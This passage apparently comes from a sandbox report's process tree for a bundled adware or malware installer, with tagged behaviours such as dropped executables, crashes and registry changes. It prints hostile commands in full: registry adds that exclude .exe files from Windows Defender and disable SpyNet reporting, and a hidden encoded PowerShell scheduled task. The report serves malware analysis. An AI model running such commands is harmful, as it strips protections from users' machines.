PID:4556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\z3FMtLuD2VOh1A1QuTrbf\Cleaner.exe"7⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\z3FMtLuD2VOh1A1QuTrbf\Cleaner.exe"C:\Users\Admin\AppData\Local\Temp\z3FMtLuD2VOh1A1QuTrbf\Cleaner.exe"8⤵
- Executes dropped EXE
PID:3656 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nsearcher.exe" /f & erase "C:\Program Files (x86)\agSearcher\nsearcher.exe" & exit7⤵PID:4476
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nsearcher.exe" /f8⤵
- Kills process with taskkill
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\Bb4isgTL\y6OyeWm2.exeC:\Users\Admin\AppData\Local\Temp\Bb4isgTL\y6OyeWm2.exe /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=721..e7893e073614e30c5434c456745a8b564⤵
- Executes dropped EXE
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\is-4FQ4S.tmp\y6OyeWm2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4FQ4S.tmp\y6OyeWm2.tmp" /SL5="$4028E,11375691,791040,C:\Users\Admin\AppData\Local\Temp\Bb4isgTL\y6OyeWm2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=721..e7893e073614e30c5434c456745a8b565⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4032 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe6⤵
- Kills process with taskkill
PID:8 -
C:\Users\Admin\Programs\Adblock\Adblock.exe"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=3d049c101657957753 --downloadDate=2022-07-16T07:49:06 --distId=marketator --pid=721..e7893e073614e30c5434c456745a8b566⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4860 -
C:\Users\Admin\Programs\Adblock\crashpad_handler.exeC:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\17d2b04b-a7e0-4818-ef9b-4aafdcd24d20.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\17d2b04b-a7e0-4818-ef9b-4aafdcd24d20.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\17d2b04b-a7e0-4818-ef9b-4aafdcd24d20.run\__sentry-breadcrumb2" --initial-client-data=0x48c,0x490,0x494,0x468,0x498,0x7ff7a051f8e0,0x7ff7a051f900,0x7ff7a051f9187⤵
- Executes dropped EXE
PID:4328 -
C:\Windows\system32\netsh.exeC:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE7⤵
- Modifies Windows Firewall
PID:2564 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -install7⤵
- Executes dropped EXE
PID:908 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -start7⤵
- Executes dropped EXE
PID:2344 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3924
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4128
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4872
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:4060 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3368
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:3684 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:2756 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:4112 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:4680 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:5076
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4400
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:3148 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1096 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:4484 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4732
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3568
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:3276 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:2240 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1696
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:4452 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:1244 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:4732 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:700 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:2720 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:4116 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:1696 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:2492 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:2572 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:2248 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4012
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:3524 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1428
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3200
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1652
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1060
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1140
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1680
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1812
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:5076 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4612
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3404 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:536
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3748
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4156
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3316
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
PID:4012 -
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3568
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2200
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4748
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3276
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2408
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4240
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:312
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1064
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1252
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1540
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3556
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3776
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3516
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1788
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3456
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4196
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3988
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1812
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2736
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1772
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4748
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3604
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2428
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3612
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4416
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4656
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3516
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2100
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:312
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3308
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2352
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3660
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1540
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:812
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3992
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4832
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3224
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3688
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3556
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2100
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2884
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2296
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1460
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1536
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3844
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4416
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4580
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2520
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2884
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1544
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1528
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:8
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2368
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3184
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:1360
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4968
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3988
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3312
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4100
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3844
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2360
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4796
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4828
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:2052
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3264
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:996
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4528
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4652
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:5108
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:4768
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵PID:3612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22404⤵
- Program crash
PID:4584 -
C:\Users\Admin\AppData\Local\Temp\iOCScfJj\qnNFsBc8mC239HI4ICw.exeC:\Users\Admin\AppData\Local\Temp\iOCScfJj\qnNFsBc8mC239HI4ICw.exe /S /site_id=6906894⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:2000 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵PID:3260
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:4092
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:2544
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:4292
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:1452
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:4400
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:4556
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:3344
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDAZrwueo" /SC once /ST 00:13:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:1852 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDAZrwueo"5⤵PID:2628
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDAZrwueo"5⤵PID:1776
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bjuwDiWYYxyfpXHSNP" /SC once /ST 07:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\rDJYlBYIgtHmaDE\diEMfCw.exe\" oO /site_id 690689 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1720 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17364⤵
- Program crash
PID:1976 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22404⤵
- Program crash
PID:4416 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22284⤵
- Program crash
PID:4484 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 23604⤵
- Program crash
PID:4664 -
C:\Users\Admin\AppData\Local\Temp\LyzedmcG\vpn.exeC:\Users\Admin\AppData\Local\Temp\LyzedmcG\vpn.exe /silent /subid=509xe7893e073614e30c5434c456745a8b564⤵
- Executes dropped EXE
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\is-06SIS.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-06SIS.tmp\vpn.tmp" /SL5="$202B6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\LyzedmcG\vpn.exe" /silent /subid=509xe7893e073614e30c5434c456745a8b565⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "6⤵PID:112
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09017⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:3472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "6⤵PID:1788
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09017⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
PID:1216 -
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3448 -
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install6⤵PID:3404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17164⤵
- Program crash
PID:3424 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24964⤵
- Program crash
PID:2516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24524⤵
- Program crash
PID:432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 21564⤵
- Program crash
PID:3740 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24964⤵
- Program crash
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\DAEtPfX8\k0b4y.exeC:\Users\Admin\AppData\Local\Temp\DAEtPfX8\k0b4y.exe /sid=9 /pid=39 /lid=e7893e073614e30c5434c456745a8b564⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:1628 -
C:\Users\Admin\AppData\Roaming\toc\plx0.exeC:\Users\Admin\AppData\Roaming\toc\plx0.exe5⤵
- Checks computer location settings
PID:1384 -
C:\Users\Admin\AppData\Roaming\toc\0Dd19.exe"C:\Users\Admin\AppData\Roaming\toc\0Dd19.exe"6⤵PID:260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24604⤵
- Program crash
PID:5036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 21204⤵
- Program crash
PID:2856 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18004⤵
- Program crash
PID:4288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24524⤵
- Program crash
PID:5032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18124⤵
- Program crash
PID:3480 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16284⤵
- Program crash
PID:2944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16884⤵
- Program crash
PID:2456 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16404⤵
- Program crash
PID:4128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16844⤵
- Program crash
PID:3304 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 20004⤵
- Executes dropped EXE
- Program crash
PID:3368 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 11804⤵
- Program crash
PID:1776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19924⤵
- Program crash
PID:456 -
